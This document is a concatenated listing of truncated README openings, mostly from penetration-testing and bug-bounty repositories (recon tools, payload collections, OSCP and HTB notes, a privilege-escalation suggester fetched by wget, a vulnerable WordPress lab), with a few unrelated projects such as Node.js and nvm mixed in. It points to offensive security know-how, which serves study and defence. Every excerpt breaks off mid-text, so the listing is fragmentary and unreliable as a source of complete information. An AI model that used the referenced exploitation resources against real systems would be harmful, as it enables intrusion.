<h1 align="center"> <br> <a href="https://github.com/six2dez/reconftw"><img src="https://github.com/six2dez/reconftw/blob/main/images/banner.png" alt="reconftw"></a> <br> reconFTW <br> </h1> <p align="center"> <a href="https://github.com/six2dez/reconftw/releases/tag/v2.4"> <img src="https://img.shiel...
![logo](docs/images/logo.png) [中文简体](./README.md) # ObserverWard | 类别 | 说明 | |-----|--------------------------------------------------------| | 作者 | [三米前有蕉皮](https://github.com/cn-kali-team) | | 团队 | [0x727](https://github.com/0x727) 未来一段时间将陆续开源工具 ...
<h1 align="center">bugbountytips</h1> <h4 align="center">Single page webapp to perform regexp search over GitHub search.</h4> <p align="center"> <img src="https://img.shields.io/badge/php-%3E=7.2.5-blue" alt="php badge"> <img src="https://img.shields.io/badge/license-MIT-green" alt="MIT license badge"> <a...
# Awesome .NET! [![Awesome](https://cdn.rawgit.com/sindresorhus/awesome/d7305f38d29fed78fa85652e3a63e154dd8e8829/media/badge.svg)](https://github.com/sindresorhus/awesome) [![Build Status](https://github.com/quozd/awesome-dotnet/actions/workflows/awesome-bot.yml/badge.svg)](https://github.com/quozd/awesome-dotnet/acti...
# JustTryHarder JustTryHarder, a cheat sheet which will aid you through the PWK course & the OSCP Exam. (Inspired by PayloadAllTheThings) Feel free to submit a Pull Request & leave a star to share some love if this helped you. 💖 **Hacktoberfest friendly!** Yes, we are open to Pull Requests for Hacktoberfest! Pleas...
# Vulnerable Wordpress Misconfig <p align="center"> <img src="images/banner.png"/> </p> This is a simple Wordpress web application that contains an example of a Security Misconfiguration vulnerability and its main goal is to describe how a malicious user could exploit multiple Security Misconfiguration vulnerabil...
# Summary recon-bluster is a automated recon tools based on target domain. Combining a set of the best recon tools to enumeration endpoint and generate a target endpoint for further vulnerability scanning. # Recon Workflow ![Alt text](images/xmind.png "recon workflow") # Installation ```shell git clone https://github.c...
## LES: Linux privilege escalation auditing tool Quick download: wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh Details about LES usage and inner workings: https://mzet-.github.io/2019/05/10/les-paper.html Additional resources for the L...
# Node Version Manager [![Build Status](https://travis-ci.org/creationix/nvm.svg?branch=master)][3] [![nvm version](https://img.shields.io/badge/version-v0.33.11-yellow.svg)][4] [![CII Best Practices](https://bestpractices.coreinfrastructure.org/projects/684/badge)](https://bestpractices.coreinfrastructure.org/projects...
# Pivoting Guide ## Table of Contents 1. [Important Notes](#Important-Notes) 2. [SSH Dynamic Port Forwarding](#SSH-Dynamic-Port-Forwarding) 3. [SSH Remote Port Forwarding](#SSH-Remote-Port-Forwarding) 4. [SSH Local Port Forwarding](#SSH-Local-Port-Forwarding) 5. [Double Pivoting](#Double-Pivoting) 6. [sshuttle](#sshu...
# Quick and easy flasher/updater for [Marauder](https://github.com/justcallmekoko/ESP32Marauder) on the Wifi Devboard! Looking for a Linux/OS X version? [Check out SkeletonMan's Python edition!](https://github.com/SkeletonMan03/FZEasyMarauderFlash) (WIP for Windows too including full automated downloads.) Looking for...
# Offensive Security Documentation OSCP Links: - https://github.com/0x4D31/awesome-oscp - https://scund00r.com/all/oscp/2018/02/25/passing-oscp.html#preperation - https://medium.com/@hakluke/haklukes-ultimate-oscp-guide-part-3-practical-hacking-tips-and-tricks-c38486f5fc97 ## Discovery - Fast host discovery for big r...
# HTB-CPTS Most of the notes, resources and scripts I used to prepare for the HTB CPTS and "pass it the 2 time." ## 29-05-2023 HTB Certified Penetration Testing Specialist (HTB CPTS) [Badge here!](https://www.credly.com/badges/333ada6a-c23e-422c-a34a-109436cbd41c/public_url) Giới thiệu về nó 1 chút: *HTB C...
--- title: "CMSeeK" category: "scanner" type: "CMS" state: "released" appVersion: "v.1.1.3" usecase: "Automation of the process of detecting the Joomla CMS and its core vulnerabilities" --- <!-- SPDX-FileCopyrightText: the secureCodeBox authors SPDX-License-Identifier: Apache-2.0 --> <!-- .: IMPORTANT! :. -----------...
# Payloads All The Things A list of useful payloads and bypasses for Web Application Security. Feel free to improve with your payloads and techniques ! I <3 pull requests :) You can also contribute with a beer IRL or with `buymeacoffee.com` [![Coffee](https://www.buymeacoffee.com/assets/img/custom_images/orange_img....
# AllThingsSSRF **This is a collection of writeups, cheatsheets, videos, related to SSRF in one single location** This is currently work in progress I will add more resources as I find them. ![SSRF Logo](/images/ssrf.jpg) ### Created By [@jdonsec](https://twitter.com/jdonsec) --- #### Learn What is SSRF - [Vickie ...
# Kubernetes > Kubernetes is an open-source container-orchestration system for automating application deployment, scaling, and management. It was originally designed by Google, and is now maintained by the Cloud Native Computing Foundation. ## Summary - [Tools](#tools) - [Container Environment](#container-environme...
# PentestNote 一份笔记,方便查阅 推 荐 使 用 **typora** 进行阅读 第一份笔记,弄的太乱,已经不想再继续更新了。 后面更多的是把知识点细化到单个仓库。感兴趣的朋友,可以看我的其他仓库。 2021.11.3 **Table of Contents** - [PentestNote](#pentestnote) - [请善用搜索[`Ctrl+F`]查找](#%E8%AF%B7%E5%96%84%E7%94%A8%E6%90%9C%E7%B4%A2ctrlf%E6%9F%A5%E6%89%BE) - [前期信息收集](#%E5%89%8D%E6%9C%9F%E4%BF%A1%E...
# Node.js Node.js is an open-source, cross-platform JavaScript runtime environment. For information on using Node.js, see the [Node.js website][]. The Node.js project uses an [open governance model](./GOVERNANCE.md). The [OpenJS Foundation][] provides support for the project. Contributors are expected to act in a c...
<header class="post-header"> <h1 class="post-title" itemprop="name headline">VulnHub: Mr. Robot</h1> <p class="post-meta"> <time datetime="2017-10-11T18:37:00+00:00" itemprop="datePublished"></header> <div class="post-content" itemprop="articleBody"> <p><strong>Hello friend.</strong></p> <p>In c...
<p align="center"> <a href="https://github.com/arthurspk/guiadevbrasil"> <img src="./images/guia.png" alt="Guia Extenso de Programação" width="160" height="160"> </a> <h1 align="center">Guia Extenso de Programação</h1> </p> ## :dart: O guia para alavancar a sua carreira > Abaixo você encontrará conteúdos pa...
![](https://i.imgur.com/1QyMN3G.png "logo by Vilhaum - https://github.com/vilhaum") [![Black Hat Arsenal](https://www.toolswatch.org/badges/arsenal/2016.svg)](https://www.toolswatch.org/2016/06/the-black-hat-arsenal-usa-2016-remarkable-line-up/) Overview (tl;dr) ========= Brosec is a terminal based reference utility...
# Scanning ## Nikto - [https://github.com/sullo/nikto](Nikto) is a web server scanner # JavaScript ## Window object - Gloabal functios and variables declared with `var` become the property of the global object ```js pink = "draconian"; console.log(window.pink) // draconian ``` ## JSFuck Looks like: `[][(![]+[])[+[]]+(...
<img src="https://user-images.githubusercontent.com/72598486/143733814-fa1960d3-0366-4061-9912-51bfb91b1abc.png" width="1000"> # Obfusc8ted: You and the AppleLabs' Incident Response Team have been notified of a potential breach to a Human Resources' workstation. According to the Human Resources representative, they ...
# Irked __URL__: https://www.hackthebox.eu/home/machines/profile/163 __Machine IP__: 10.10.10.117 __DATE__ : 10/04/2019 ------------------------------------------------------------------------------- Let's start with the basics `NMAP` - Full port scan ------------------------ ```bash ➜ nmap -p- 10.10.10.117 Star...
# 📖 ReadMe [![License: CC BY-SA 4.0](https://raw.githubusercontent.com/7h3rAm/7h3rAm.github.io/master/static/files/ccbysa4.svg)](https://creativecommons.org/licenses/by-sa/4.0/) <a name="contents"></a> ## 🔖 Contents - ☀️ [Methodology](#methodology) * ⚙️ [Phase 0: Recon](#mrecon) * ⚙️ [Phase 1: Enumerate](#menum...
<p align="center"> <img width="60%" src="https://github.com/edoardottt/images/blob/main/eJPT-notes/ejpt.jpg"> </p> > **Note** > These are all the notes I took while following the INE course for eJPT certification, I strongly think everything you need to pass the exam is in this 'cheatsheet'. Info about eJPT certifica...
#### This github repo is for my Hackthebox writeups. <!-- ## Welcome to GitHub Pages You can use the [editor on GitHub](https://github.com/F41zK4r1m/HackTheBox/edit/gh-pages/index.md) to maintain and preview the content for your website in Markdown files. Whenever you commit to this repository, GitHub Pages will run...
# Node Version Manager [![Build Status](https://travis-ci.org/creationix/nvm.svg?branch=master)][3] [![nvm version](https://img.shields.io/badge/version-v0.33.8-yellow.svg)][4] [![CII Best Practices](https://bestpractices.coreinfrastructure.org/projects/684/badge)](https://bestpractices.coreinfrastructure.org/projects/...
- [PHISHING TOOLS](#phishing-tools) - [OSINT](#osint) - [Awesome List](#awesome-list) - [APTS](#apts) - [SSRF](#ssrf) - [Reverse Engineering](#reverse_engineering) - [MALWARE](#malware) - [Machine Learning](#machine-Learning) - [MALWARE SAMPLES](#malware-samples) - [CHEATSHEETS](#cheatsheets) - [Machine learning & hack...
# TensorFlow Lite C++ image classification demo This example shows how you can load a pre-trained and converted TensorFlow Lite model and use it to recognize objects in images. Before you begin, make sure you [have TensorFlow installed](https://www.tensorflow.org/install). You also need to [install Bazel](https://do...
# Banzai ## Table of Contents * [Executive Summary](#executive-summary) * [Attack Vectors](#attack-vectors) * [Recommendations](#recommendations) * [Methodology](#methodology) * [Reconnaissance](#reconnaissance) * [Enumeration](#enumeration) * [Gaining Access](#gaining-access) * [Maintaining Access](#mainta...
### **Awesome Penetration Testing** [![Links Check](https://4.bp.blogspot.com/-_NIGc5XKpSw/WHt9d7wCXaI/AAAAAAAAB0o/OYIv8EWjIoYh44jfxIRSrRYbgrn3MZKEQCLcB/s1600/penetration%2Btesting.png)](http://kalitut.com) [![10 Common Hacking Techniques](http://img.youtube.com/vi/V3CTfJ2ZP7M/0.jpg)](http://www.youtube.com/watch?v=V3C...
# SQL injection > A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application. Attempting to manipulate SQL queries may have goals including: - Information Leakage - Disclosure of stored data - Manipulation of stored data - Bypassing authorisation c...
# FYI - This repo is a collection of my contents <h4 align="left"> Made with ❤️ ❤️ ❤️ from <img src="https://user-images.githubusercontent.com/8291014/145205748-5530f102-9102-4659-a141-21872f237c57.png" alt="frogy" height=20px> </h4> ![](https://visitor-badge.glitch.me/badge?page_id=iamthefrogy.fyi)<a href="https://tw...
# Security Resources 📖 Links to online resources & tools we use during our web application / network security [courses](https://compass-security.com/en/trainings). You can create a PR or open an issue if you think we missed a useful resource. Short URL: https://git.io/secres ## Compass Security 🧭 - Compass Secur...
# Bug Bounty RoadMap Bug Bounty is the technique/process of finding bugs on programs by using different methodology and reporting those bugs to the respective program organizing company. After reporting the bug you receive a amount called bounty. Not all program provides you bounty for submitting for bug , programs li...
# Armageddon - Linux (Easy) ## Summary Armageddon was a straightforward box that involved a Drupalgeddon2 exploit which is quite common. I was able to upload a webshell and run commands to get initial access. Once I got initial access, I was able to access the database where the admin hash, once cracked was reused. T...
# theGreatRecon Note that the script isn't 100% automated. it gets you to type some Y or N in it. ====== theGreatSetup.sh is the Script for installing and configuring my daily recon tools. Debian Based only. ==== the script creates: ~/go ~/go/bin ~/go/pkg ~/go/src ~/tools and install all tools necessary for...
<h1>Bug-Bounty Writeup Section 👨‍💻 : For All, by All (regular updates)</h1> <a href="https://fardeen-ahmed.github.io/"> <img src="https://github.com/fardeen-ahmed/Bug-bounty-Writeups/blob/main/1.png" alt="None" align="center" height="250" width="1000"> </a> <h4>This is a place of all the Offensive Cybersecurity peo...